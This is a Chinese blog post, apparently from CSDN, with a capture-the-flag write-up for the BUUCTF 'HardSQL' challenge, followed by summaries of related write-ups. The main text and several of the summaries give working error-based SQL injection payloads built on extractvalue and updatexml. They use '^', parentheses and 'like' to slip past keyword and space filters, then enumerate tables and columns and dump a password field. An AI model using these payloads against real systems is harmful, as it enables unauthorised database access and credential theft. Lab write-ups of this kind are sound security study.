[BUUCTF]HardSQL(writeup)

最新推荐文章于 2024-06-18 16:59:41 发布
最新推荐文章于 2024-06-18 16:59:41 发布
阅读量196 收藏
点赞数
分类专栏: buuctf--web 文章标签: 数据库 网络安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63306244/article/details/131340983
版权

sql注入题进入后直接惯例

输入admin / 2'or'1

随后来到这个界面

在url的username或password后面

随便加点东西看看

发现有报东西

 

使用bp试试看过滤了哪些东西

发现select、ascii、空格、=等被过滤

再加上之前页面的报错

就确定了需要用报错注入来做

随后构造注入语句

因为“=”、“空格”被过滤了

所以就用常用的" like "和" () "来绕过

1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))))#
或
1'^(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),1))#

得到数据库名后构造下一句

1'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))))%23
#或
1'^(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),1))%23

由此类推下去得到下一句语句

1'^extractvalue(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1))))%23

 但是当你输入后会发现

他只给了你前半段的flag

这是为什么,那该怎么办呢

这是因为extractvalue函数限制了一次字符串只能输出32位

只需要使用leftright函数即可

最终语句为

1'^extractvalue(1,concat(0x7e,(select(group_concat(right(password,30)))from(H4rDsq1))))%23
或
1'^(updatexml(1,concat(0x7e,(select(group_concat(right(password,30)))from(H4rDsq1))),1))%23

 

xiao孩
关注
专栏目录
BUUCTF-WriteUp
鱼的博客
01-19 435
title: BUUCTF WriteUp date: 2021-01-16 17:44:59 tags: CTF WriteUP WEB [HCTF 2018]WarmUp 启动环境,打开网址是一张滑稽,没什么用,看一下源码,发现有注释。 访问source.php,直接给了源码,进行代码审计。 分两块,第一块是emmm::checkFile,里面做了一些判断。 第二块是一个include,文件包含,我们要绕过验证,也就是上面的checkFile方法。 hint.php include触发的三个判断.
buuctf-HardSQL
m0_62094846的博客
04-02 1411
这道题过滤了很多sql注入的关键词(可以用bp,fuzz出来,下次试试) 包括空格,但是没有过滤报错注入的两个关键词updatexml和extractvalue 用报错注入 查库名(geek) ?username=1'or(updatexml(1,concat(0x7e,(database()),0x7e),1))%23&password=1 查找所有数据库 ?username=admin'or(updatexml(1,concat(0x7e,(select(grou...
Buuctf:[极客大挑战 2019]HardSQL
fcz___的博客
03-12 299
payload:用户名:1’^(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#密码:1。可以看到,or, by, and union 等都过滤了。好我们先记下这半边,查一下又半边再接上就行了。好家伙,又是他.这次他又有能耐了。我们先试试万能能密码。我们跑个fuzz看看过滤了啥。
BUUCTF [极客大挑战 2019] HardSQL 1
最新发布
m0_74167420的博客
06-18 276
原因:在输入' 或者 # 号时,'会被识别出来过滤掉,#会注释掉后面的内容,因此要进行url编码。在该题目中,双写被过滤掉了,同时空格,=,union也被过滤了。或者, payload为: 用 ^ 符号代替 or。1、阅读题目,是SQL注入的题目类型。2、尝试万能密码和堆叠注入,均被过滤。
Buuctf-[极客大挑战 2019]HardSQL
m0_63563528的博客
04-13 282
的,任何可以计算出结果的语句都可以用括号围起来,而括号的两端,可以没有多余的空格。我们知道,出现这个说明闭合成功了,但是之后发现它过滤了好多字符和语句,我输入。拼接一下flag,把重复部分删咯,就可以成功提交。又得到了:98-8e23-3728c2f96a1d}报错注入回显嘛,直接获取数据库名“geek”空格被过滤了 ,怎样绕过呢?我来试一下:输入1'(or)#
BUUCTF——[极客大挑战 2019]HardSQL
Ho1aAs‘s Blog
05-18 343
文章目录利用点解题完 利用点 SQL报错注入 SQL空格、等号、截取字符串绕过过滤 解题 SQL注入,报错显示是字符型注入,闭合单引号 check.php?username=a'&password=1 过滤了短横线,因此注释符用# check.php?username=a'%23&password=1 由于上面有报错信息,尝试报错注入 过程中发现,过滤了空格,那么采用括号包裹语句,尝试报错注入 check.php?username=a'or(extractvalue(1,conca
BUUCTFHardSQL[极客大挑战 2019]
金 帛的博客
06-06 1391
buucft记录贴
BUUCTF_WriteUp 2021-08-23
m0_56897090的博客
08-23 376
2021-08-23 文章目录2021-08-23shell_asm题目描述题目分析BabyROP题目描述解题思路0x01 整体思路0x02 额外前置知识:0x03 expnot_the_same_3dsctf_20160x01 解题思路0x02 expBJDCTF-babystack0x01 解题思路0x02 Expjarvisoj_level20x01 整体分析0x02 exp32位0x03 64位解法get_started_3dsctf_20160x01 程序整体分析预期解法解法2:mprotectc
BUUCTF WEB writeup(持续更新)
zjnu_y3s的博客
09-24 822
BUUCTF WEB(持续更新) 1、Warmup 打开题目链接,得到一张图片,如下图: 此时先想到看这个网页的源代码,输入source.php即可得到源代码,如下图: 进入php代码审计,粗略看一下可以发现有file,所以我们要想办法得到file,首先先看与file有关的代码块: 看到中间发现需要前面创建的函数,所以我们返回去进行前面代码的审计,在白名单处能看到有两个文件,一个source.php、一个hint.php,我们先打开hint.php,可以看到如下字符: 暂时不知道是干什么用的,
HCTF2018-warmup-writeup
ST0new的博客
09-26 2634
warmup-wpBUUCTFwebwarmup BUUCTF web warmup 这里我直接上代码讲 菜鸡不会php,全是现查 哪里不对,欢迎大佬指点 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) ...
[BUUCTF刷题]HardSQL
weixin_43952190的博客
07-03 2062
HardSQL 进入后是sql注入页面,过滤了一些字符,先进行fuzz测试。 发现过滤了union,双写也无法绕过,所以不能使用常规的方法进行注入。但发现没有过滤extractvalue和updatexml。 也过滤了空格,使用括号绕过。 首先,注数据库名称 username=admin'or(updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1))%23&password=1 然后得到表名(过滤=,使用like) userna
BUUCTF---web---[极客大挑战 2019]HardSQL
2201_75556700的博客
05-19 807
7、 太可恶了,只爆出了一半,问题不大,我们使用right()函数,爆出password的 ,一般flag的长度为32位,加上前面爆出了大概有二十来个,继续爆右边大概15个就可以凑完整,不放心的话,可以爆长点。2、使用万能密码发现不可以,这种题前面有很多,这道题用前面的绕过方法不行,得换一种前面没有用过的方法,最近刚学了报错注入,前面就没有用这个方法,这里试试。查阅资料后发现需要构造下面的方法 and用^替换,#用%23替换,空格用()替换。4、用类似的方法查表名:这里注意=用like替换。
buuctf-[极客大挑战 2019]HardSQL
2202_75317918的博客
09-18 344
buuctf-[极客大挑战 2019]HardSQL
buuctf-[极客大挑战 2019]HardSQL(小宇特详解)
小宇的web博客
01-26 3069
buuctf-[极客大挑战 2019]HardSQL(小宇特详解) 遇到了SQL注入,先尝试一下万能密码,虽然感觉%100不能用 果不其然 双写再试一下发现也不行 这里使用extractvalue和updatexml进行报错注入,空格和=号没有,所以我们要使用()来代替空格,使用like来代替=号 使用extractvalue() /check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database
BUUCTF [极客大挑战 2019]HardSQL
CrotZZ的博客
07-08 224
尝试万能密码被逮住 1’ or 1=1# 经过一系列尝试 order by,union select之类的都被过滤 网上别人的write参考了一下,这里是报错注入,用到xpath语法错误中extractvalue ^表异或,这里or and都被过滤了包括替换成&& ||我也试过也不行。 网上了解了下报错注入,这题目extractvalue里select后要加括号(比如下面database()外面加了括号),而正常情况下是不用的,猜测是空格被过滤的原因。 check.php?username
【CTF】BUUCTFCrypto 部分题解(持续更新)
Rm_mR的博客
04-25 1311
【CTF】Buuctf Crypto 部分题解(持续更新)
buuctf lovesql
08-10
- *1* *2* *3* [【BUUCTF】[极客大挑战 2019]LoveSQL 详细题解总结笔记 Writeup](https://blog.csdn.net/vanarrow/article/details/107991185)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630",...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值